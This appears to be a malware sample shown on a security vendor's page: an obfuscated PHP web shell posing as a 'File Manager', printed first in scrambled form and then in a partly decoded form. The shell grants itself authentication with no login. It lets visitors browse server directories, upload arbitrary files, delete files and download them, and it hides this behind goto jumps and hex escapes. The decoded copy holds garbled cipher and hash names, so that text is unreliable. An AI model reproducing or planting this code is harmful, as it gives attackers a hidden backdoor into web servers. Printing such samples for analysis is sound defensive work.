goto q0dzF; OTMkj: if ($path !== "\x2f") {
<a href="echo htmlspecialchars(generateLink(array("\160\x61\164\x68" => encryptPath($parent, $secret_key)), $secret_key));
"class="back-link">β¬
οΈ Go Back</a>} goto LR_7u; q0dzF: session_start(); goto LWxxr; LR_7u:
<ul>goto zXeqZ; QZ0I1: if ($_SERVER["\x52\x45\x51\x55\105\x53\x54\x5f\x4d\105\124\110\x4f\104"] === "\120\x4f\x53\124" && isset($_FILES["\146\151\x6c\145"])) { $uploadPath = $path . DIRECTORY_SEPARATOR . basename($_FILES["\x66\x69\154\x65"]["\156\x61\x6d\145"]); move_uploaded_file($_FILES["\x66\151\x6c\145"]["\x74\155\x70\x5f\156\141\155\145"], $uploadPath); header("\x4c\157\143\141\164\x69\x6f\156\72\x20" . generateLink(array("\x70\141\164\150" => encryptPath($path, $secret_key)), $secret_key)); die; } goto uL0b_; zXeqZ: foreach ($files as $file) { if ($file === "\x2e") { continue; }
<li>$fullPath = $path . DIRECTORY_SEPARATOR . $file; $isDir = is_dir($fullPath); if ($isDir) {
<span class="folder">π</span> <a href="echo htmlspecialchars(generateLink(array("\x70\x61\x74\150" => encryptPath($fullPath, $secret_key)), $secret_key));
"class="folder">echo htmlspecialchars($file);
</a>} else {
<span class="file">π</span>echo htmlspecialchars($file);
<span class="actions"><a href="echo htmlspecialchars(generateLink(array("\x70\x61\x74\150" => encryptPath($path, $secret_key), "\144\145\x6c\145\x74\x65" => encryptPath($fullPath, $secret_key)), $secret_key));
"onclick='return confirm("Are you sure you want to delete this file?")'>π Delete</a> | <a href="echo htmlspecialchars($fullPath);
"download>β¬οΈ Download</a> </span>}
</li>} goto EP6Z_; H27N8: $files = scandir($path); goto jnJsB; POdeV: if ($path === false || !is_dir($path)) { $path = getcwd(); } goto H27N8; Ar0wj: function encryptPath($data, $key) { $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length("\x61\145\x73\55\x32\x35\66\55\x63\142\143")); $encrypted = openssl_encrypt($data, "\x61\145\x73\x2d\x32\x35\x36\x2d\143\x62\143", $key, 0, $iv); return base64_encode($encrypted . "\x3a\72" . $iv); } goto u4IuY; cuOIA: function verifyRequest($params, $key) { if (!isset($params["\x68\x6d\141\x63"])) { return false; } $hmac = $params["\150\x6d\x61\x63"]; unset($params["\x68\155\x61\143"]); ksort($params); $data = http_build_query($params); $calculated = hash_hmac("\x73\150\x61\x32\x35\66", $data, $key); return hash_equals($hmac, $calculated); } goto ULmlU; jnJsB: $parent = dirname($path); goto QZ0I1; u4IuY: function decryptPath($data, $key) { $data = base64_decode($data); if ($data === false) { return false; } list($encrypted_data, $iv) = explode("\x3a\x3a", $data, 2); return openssl_decrypt($encrypted_data, "\x61\x65\x73\55\62\x35\66\x2d\x63\x62\143", $key, 0, $iv); } goto SANu6; LWxxr: $secret_key = "\171\x6f\x75\x72\55\x73\x65\x63\162\145\x74\x2d\x6b\x65\x79\x2d\61\62\x33"; goto yGR2X; BliDW:
</div>goto OTMkj; bUEhH: $path = isset($_GET["\160\141\164\150"]) ? decryptPath($_GET["\x70\141\x74\150"], $secret_key) : getcwd(); goto p0a9y; npnsx: $cumulative = ''; goto KWIwR; p0a9y: $path = realpath($path); goto POdeV; yGR2X: if (!isset($_SESSION["\x61\165\x74\150\145\156\x74\x69\x63\x61\x74\x65\144"])) { $_SESSION["\x61\165\164\x68\145\156\164\x69\143\x61\164\x65\x64"] = true; } goto Ar0wj; WnfQ0:
<!doctypehtml><html lang="en"><head><meta charset="UTF-8"><title>File Manager</title><style>body{background-color:#121212;color:#eee;font-family:Arial,sans-serif;padding:20px}a{color:#00bcd4;text-decoration:none}a:hover{text-decoration:underline}.folder{font-weight:700;color:#ffc107}.file{color:#ccc}.actions{float:right}input[type=file]{margin-top:10px}.upload-form{margin-top:20px}.back-link{margin-bottom:20px;display:block}.breadcrumb a{color:#90caf9;margin-right:5px}.breadcrumb span{margin-right:5px;color:#aaa}</style></head><body><h2>π File Manager</h2><div class="breadcrumb"><strong>Current Path:</strong>goto tsY7z; uL0b_: if (isset($_GET["\x64\x65\154\x65\164\145"])) { $target = decryptPath($_GET["\x64\x65\x6c\x65\164\145"], $secret_key); $target = realpath($target); if ($target && strpos($target, $path) === 0 && is_file($target)) { unlink($target); } header("\114\x6f\143\x61\164\151\157\156\72\40" . generateLink(array("\x70\141\164\x68" => encryptPath($path, $secret_key)), $secret_key)); die; } goto WnfQ0; KWIwR: foreach ($parts as $index => $part) { if ($part === '') { continue; } $cumulative .= DIRECTORY_SEPARATOR . $part; $link = generateLink(array("\160\141\164\x68" => encryptPath($cumulative, $secret_key)), $secret_key); echo "\x3c\141\40\150\162\145\146\75\42" . htmlspecialchars($link) . "\42\76" . htmlspecialchars($part) . "\x3c\57\x61\x3e"; if ($index < count($parts) - 1) { echo "\74\x73\x70\141\x6e\76\xe2\236\xa4\x3c\x2f\163\x70\x61\x6e\x3e"; } } goto BliDW; tsY7z: $parts = explode(DIRECTORY_SEPARATOR, $path); goto npnsx; SANu6: function generateLink($params, $key) { ksort($params); $data = http_build_query($params); $hmac = hash_hmac("\163\x68\141\62\x35\x36", $data, $key); $params["\150\x6d\x61\x63"] = $hmac; return "\77" . http_build_query($params); } goto cuOIA; ULmlU: if (!empty($_GET) && !verifyRequest($_GET, $secret_key)) { header("\110\124\x54\120\x2f\61\x2e\x30\x20\x34\x30\63\40\106\x6f\x72\x62\151\x64\144\145\156"); echo "\111\x6e\166\x61\x6c\151\x64\40\x52\x65\x71\165\145\x73\x74"; die; } goto bUEhH; EP6Z_:
</ul><form class="upload-form"enctype="multipart/form-data"method="post"><label>π€ Upload a file:</label><br><input name="file"required type="file"> <button type="submit">Upload</button></form></body></htm
goto q0dzF; OTMkj: if ($path !== "/") {
<a href="echo htmlspecialchars(generateLink(array("path" => encryptPath($parent, $secret_key)), $secret_key));
"class="back-link">β¬
οΈ Go Back</a>} goto LR_7u; q0dzF: session_start(); goto LWxxr; LR_7u:
<ul>goto zXeqZ; QZ0I1: if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_FILES["file"])) { $uploadPath = $path . DIRECTORY_SEPARATOR . basename($_FILES["file"]["name"]); move_uploaded_file($_FILES["file"]["tmp_name"], $uploadPath); header("Location: " . generateLink(array("path" => encryptPath($path, $secret_key)), $secret_key)); die; } goto uL0b_; zXeqZ: foreach ($files as $file) { if ($file === ) { continue; }
<li>$fullPath = $path . DIRECTORY_SEPARATOR . $file; $isDir = is_dir($fullPath); if ($isDir) {
<span class="folder">π</span> <a href="echo htmlspecialchars(generateLink(array("path" => encryptPath($fullPath, $secret_key)), $secret_key));
"class="folder">echo htmlspecialchars($file);
</a>} else {
<span class="file">π</span>echo htmlspecialchars($file);
<span class="actions"><a href="echo htmlspecialchars(generateLink(array("path" => encryptPath($path, $secret_key), "delete" => encryptPath($fullPath, $secret_key)), $secret_key));
"onclick='return confirm("Are you sure you want to delete this file?")'>π Delete</a> | <a href="echo htmlspecialchars($fullPath);
"download>β¬οΈ Download</a> </span>}
</li>} goto EP6Z_; H27N8: $files = scandir($path); goto jnJsB; POdeV: if ($path === false || !is_dir($path)) { $path = getcwd(); } goto H27N8; Ar0wj: function encryptPath($data, $key) { $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length("aesj56-cbc")); $encrypted = openssl_encrypt($data, "aes-256-cbc", $key, 0, $iv); return base64_encode($encrypted . "::" . $iv); } goto u4IuY; cuOIA: function verifyRequest($params, $key) { if (!isset($params["hmac"])) { return false; } $hmac = $params["hmac"]; unset($params["hmac"]); ksort($params); $data = http_build_query($params); $calculated = hash_hmac("sha256", $data, $key); return hash_equals($hmac, $calculated); } goto ULmlU; jnJsB: $parent = dirname($path); goto QZ0I1; u4IuY: function decryptPath($data, $key) { $data = base64_decode($data); if ($data === false) { return false; } list($encrypted_data, $iv) = explode("::", $data, 2); return openssl_decrypt($encrypted_data, "aes-6-cbc", $key, 0, $iv); } goto SANu6; LWxxr: $secret_key = "your-secret-key-1"; goto yGR2X; BliDW:
</div>goto OTMkj; bUEhH: $path = isset($_GET["path"]) ? decryptPath($_GET["path"], $secret_key) : getcwd(); goto p0a9y; npnsx: $cumulative = ''; goto KWIwR; p0a9y: $path = realpath($path); goto POdeV; yGR2X: if (!isset($_SESSION["authenticated"])) { $_SESSION["authenticated"] = true; } goto Ar0wj; WnfQ0:
<!doctypehtml><html lang="en"><head><meta charset="UTF-8"><title>File Manager</title><style>body{background-color:#121212;color:#eee;font-family:Arial,sans-serif;padding:20px}a{color:#00bcd4;text-decoration:none}a:hover{text-decoration:underline}.folder{font-weight:700;color:#ffc107}.file{color:#ccc}.actions{float:right}input[type=file]{margin-top:10px}.upload-form{margin-top:20px}.back-link{margin-bottom:20px;display:block}.breadcrumb a{color:#90caf9;margin-right:5px}.breadcrumb span{margin-right:5px;color:#aaa}</style></head><body><h2>π File Manager</h2><div class="breadcrumb"><strong>Current Path:</strong>goto tsY7z; uL0b_: if (isset($_GET["delete"])) { $target = decryptPath($_GET["delete"], $secret_key); $target = realpath($target); if ($target && strpos($target, $path) === 0 && is_file($target)) { unlink($target); } header("Location: " . generateLink(array("path" => encryptPath($path, $secret_key)), $secret_key)); die; } goto WnfQ0; KWIwR: foreach ($parts as $index => $part) { if ($part === '') { continue; } $cumulative .= DIRECTORY_SEPARATOR . $part; $link = generateLink(array("path" => encryptPath($cumulative, $secret_key)), $secret_key); echo "<a href="" . htmlspecialchars($link) . "">" . htmlspecialchars($part) . "</a>"; if ($index < count($parts) - 1) { echo "<span>β€</span>"; } } goto BliDW; tsY7z: $parts = explode(DIRECTORY_SEPARATOR, $path); goto npnsx; SANu6: function generateLink($params, $key) { ksort($params); $data = http_build_query($params); $hmac = hash_hmac("sha6", $data, $key); $params["hmac"] = $hmac; return "?" . http_build_query($params); } goto cuOIA; ULmlU: if (!empty($_GET) && !verifyRequest($_GET, $secret_key)) { header("HTTP/1.0 403 Forbidden"); echo "Invalid Request"; die; } goto bUEhH; EP6Z_:
</ul><form class="upload-form"enctype="multipart/form-data"method="post"><label>π€ Upload a file:</label><br><input name="file"required type="file"> <button type="submit">Upload</button></form></body></htm
© 2023 Quttera Ltd. All rights reserved.